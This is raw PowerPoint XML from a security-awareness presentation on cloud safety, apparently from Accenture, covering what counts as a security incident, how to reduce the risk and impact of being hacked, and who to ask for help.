        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="9000" dirty="0"/>
              <a:t>Obscurity</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="9000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="9000" dirty="0"/>
              <a:t>is not a </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="9000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="9000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>form of defense</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5176824" y="-28824"/>
            <a:ext cx="6375295" cy="6654768"/>
            <a:chOff x="5176824" y="-28824"/>
            <a:chExt cx="6375295" cy="6654768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 8"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="2700000">
              <a:off x="8702849" y="5190237"/>
              <a:ext cx="1768941" cy="1102473"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Picture 13"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="19800000" flipH="1">
              <a:off x="5680639" y="5307976"/>
              <a:ext cx="2232107" cy="1317167"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="19" name="Group 18"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5176824" y="-28824"/>
              <a:ext cx="6375295" cy="5597754"/>
              <a:chOff x="5176824" y="-28824"/>
              <a:chExt cx="6375295" cy="5597754"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="4" name="Picture 3"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="10291367" y="3717032"/>
                <a:ext cx="693230" cy="432048"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="Picture 6"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm rot="3227647">
                <a:off x="10073764" y="4643048"/>
                <a:ext cx="1140783" cy="710981"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="8" name="Picture 7"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm rot="19446255" flipH="1">
                <a:off x="6028418" y="4438537"/>
                <a:ext cx="1231785" cy="754529"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="10" name="Picture 9"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="7107495" y="3717032"/>
                <a:ext cx="360041" cy="224392"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="11" name="Picture 10"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm rot="20700000" flipH="1">
                <a:off x="7318707" y="4231926"/>
                <a:ext cx="360041" cy="224392"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="12" name="Picture 11"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="9006424" y="3797409"/>
                <a:ext cx="231075" cy="144015"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="13" name="Picture 12"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm rot="1800000">
                <a:off x="9147731" y="4300924"/>
                <a:ext cx="693230" cy="432048"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="15" name="Picture 14"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm rot="19800000" flipH="1">
                <a:off x="5176824" y="4308312"/>
                <a:ext cx="633836" cy="388256"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="16" name="Picture 15"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm rot="17100000" flipV="1">
                <a:off x="10618355" y="229486"/>
                <a:ext cx="1079691" cy="787837"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="17" name="Picture 16"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm rot="11700000" flipV="1">
                <a:off x="6304286" y="159455"/>
                <a:ext cx="1079691" cy="787837"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="18" name="Picture 17"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm rot="14400000" flipV="1">
                <a:off x="8177633" y="125743"/>
                <a:ext cx="675227" cy="366094"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="319844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98000">
              <a:srgbClr val="FF9500"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="6000000" scaled="0"/>
          <a:tileRect/>
        </a:gradFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7668617" y="4005064"/>
            <a:ext cx="4032448" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>THIS SUCKS!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="grayWhite">
          <a:xfrm>
            <a:off x="190500" y="1484784"/>
            <a:ext cx="12314212" cy="4762500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="24000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wait 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="24000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2962893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98000">
              <a:srgbClr val="FF9500"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="6000000" scaled="0"/>
          <a:tileRect/>
        </a:gradFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="https://c1.staticflickr.com/9/8381/8652860588_481e841b19_b.jp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7655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52184" y="404664"/>
            <a:ext cx="4032448" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>YES</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7200" dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>THIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DOES SUCK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="781411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8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1371600"/>
            <a:ext cx="11430000" cy="4689475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="341311" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" strike="sngStrike" dirty="0"/>
              <a:t>The imbalance of attacking versus defence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="341311" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" strike="sngStrike" dirty="0"/>
              <a:t>What do hackers want to do?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="341311" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" strike="sngStrike" dirty="0"/>
              <a:t>The imbalance of damage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="341311" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" strike="sngStrike" dirty="0"/>
              <a:t>How to actually hack!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" strike="sngStrike" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="341311" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>What does security incident mean? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="341311" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>How can you reduce the risk of being hacked?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="341311" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>How can you reduce the impacts of being hacked?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="341311" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>What to do if you’ve been attacked,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>talking about cloud safety</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2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Copyright 2017 Accenture. All rights reserved.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2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9AC08D-23A9-440E-BCB9-AA1E9877CC3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35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rgbClr val="710012"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="1800000" scaled="0"/>
        </a:gra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bwMode="grayWhite"/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WHAT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DOES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>incident</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MEAN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5447928" y="279278"/>
            <a:ext cx="3744416" cy="432048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Something got published by mistake</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5879976" y="1124744"/>
            <a:ext cx="3816424" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>An Amazon / ACP report </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>of high network access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5735960" y="5589240"/>
            <a:ext cx="3816424" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Evidence of unauthorised </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8672451" y="2969333"/>
            <a:ext cx="3816424" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Something looks  odd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8375576" y="4279286"/>
            <a:ext cx="3816424" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Find something we </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>didn’t create</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26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flipH="1">
            <a:off x="6763482" y="1196752"/>
            <a:ext cx="5428517" cy="5695492"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>If in </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>doubt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ask</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>help</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4583832" y="3429000"/>
            <a:ext cx="2376264" cy="2880320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="45720" rtlCol="0">
            <a:noAutofit/>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Your lead</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Country lead</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Markos</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Project team</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ASOC</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kumimoji="0" lang="en-US" sz="36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19931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98000">
              <a:srgbClr val="FF9500"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="6000000"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bwMode="grayWhite">
          <a:xfrm>
            <a:off x="190500" y="1484784"/>
            <a:ext cx="12314212" cy="4762500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="24000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wait 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="24000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
